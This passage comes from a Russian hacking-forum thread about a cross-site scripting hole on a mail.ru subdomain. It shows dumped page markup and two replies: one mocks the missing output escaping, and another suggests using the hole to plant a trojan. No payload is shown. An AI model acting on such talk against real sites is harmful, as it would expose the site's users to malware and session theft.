nowrap&gt;&lt;a href="/softclub-main.php"&gt;СОФТ-КЛУБ&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" nowrap&gt;&lt;a href="/developers.php"&gt;РАЗРАБОТЧИКАМ&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" nowrap&gt;&lt;a href="http://sysadmin.mail.ru"&gt;СИСАДМИН&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" nowrap&gt;&lt;a href="/forums.php"&gt;ФОРУМЫ&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" nowrap&gt;&lt;a href="/competitions.php"&gt;КОНКУРСЫ&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" nowrap&gt;&lt;a href="/delivery.php"&gt;РАССЫЛКИ&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" nowrap&gt;&lt;a href="/award2007/" target="_blank"&gt;СОФТ&nbsp;ГОДА&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9"&gt;&lt;a href="http://allsoft.ru?from=topsfm" target="_blank"&gt;МАГАЗИН&lt;/a&gt;&lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" width="100%"&gt;&nbsp;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" align="right"&gt;&lt;a href="/about.php"&gt;О&nbsp;проекте&lt;/a&gt;&nbsp;&nbsp;&nbsp;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td colspan="10" class="ms2"&gt; &lt;!--Навигация Soft-клуб - начало--&gt; &lt;table cellpadding="0" cellspacing="0" border="0" class="menu" width="100%"&gt; &lt;tr align="center"&gt; &lt;td nowrap align="left"&gt;&lt;a href="/new_prog.php"&gt;Новинки&lt;/a&gt;&lt;/td&gt; &lt;td style="padding-left:7px; padding-right:7px"&gt;&lt;b&gt;&middot;&lt;/b&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href="/rating.php"&gt;Рейтинги&lt;/a&gt;&lt;/td&gt; &lt;td style="padding-left:7px; padding-right:7px"&gt;&lt;b&gt;&middot;&lt;/b&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href="/reviews.php"&gt;Обзоры&lt;/a&gt;&lt;/td&gt; &lt;td style="padding-left:7px; padding-right:7px"&gt;&lt;b&gt;&middot;&lt;/b&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href="/program_week_archive.php"&gt;Программы недели&lt;/a&gt;&lt;/td&gt; &lt;td style="padding-left:7px; padding-right:7px"&gt;&lt;b&gt;&middot;&lt;/b&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href="/competitions/sm/"&gt;Софт-марафон&lt;/a&gt;&lt;/td&gt; &lt;td style="padding-left:7px; padding-right:7px"&gt;&lt;b&gt;&middot;&lt;/b&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href="/faq.php"&gt;FAQ&lt;/a&gt;&lt;/td&gt; &lt;td nowrap align="right" width="100%"&gt;&lt;a href="http://soft.mail.ru/"&gt;На главную страницу&lt;/a&gt;&nbsp;&nbsp;&nbsp;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;!--Навигация Soft-клуб - конец--&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td colspan="10" class="cor" align="right"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/1.gif" width="1" height="1"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td colspan="10"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width="760" height="1"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;!--Навигация Soft.Mail.ru- конец--&gt; &lt;table border="0" cellspacing="0" cellpadding="0" width="90%" align="center"&gt; &lt;!--left - begin--&gt;&lt;!-- API.inc - начало--&gt;&lt;td width=23% valign=top&gt;&lt;img src=img/0.gif width=240 height=1&gt;&lt;br&gt;&lt;!
Post #: 3
RE: xss на mail.ru - 2008-03-17 13:18:41.030000   
heaven7

Сообщений: 134
Оценки: 5
Присоединился: 2007-12-29 20:49:38.910000
 Иногда просто удивляешься, ну что, сложно было взять nl2br от htmlspecialchars?
Нет, блин, надо было не только допустить ошибку, но ещё и усложноить себе жизнь вытаскиванием из текста различных тегов. Тут, правда, возникают сомнения по поводу использования хпх на поддомене маил.ру
Post #: 4
RE: xss на mail.ru - 2008-03-17 15:06:47.253333   
Werm_Rolent

Сообщений: 280
Оценки: 0
Присоединился: 2004-08-02 22:39:27
 прикольно - можна ещё и троянчик вскунть
Post #: 5
Страниц:  [1]
Все форумы >> [Для начинающих] >> xss на mail.ru







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.